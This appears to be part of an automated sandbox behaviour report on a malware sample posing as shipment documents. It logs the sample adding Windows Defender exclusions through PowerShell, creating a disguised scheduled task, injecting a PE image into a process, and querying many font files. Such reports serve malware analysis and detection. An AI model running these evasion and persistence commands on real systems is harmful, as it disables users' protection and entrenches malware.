Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory written: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
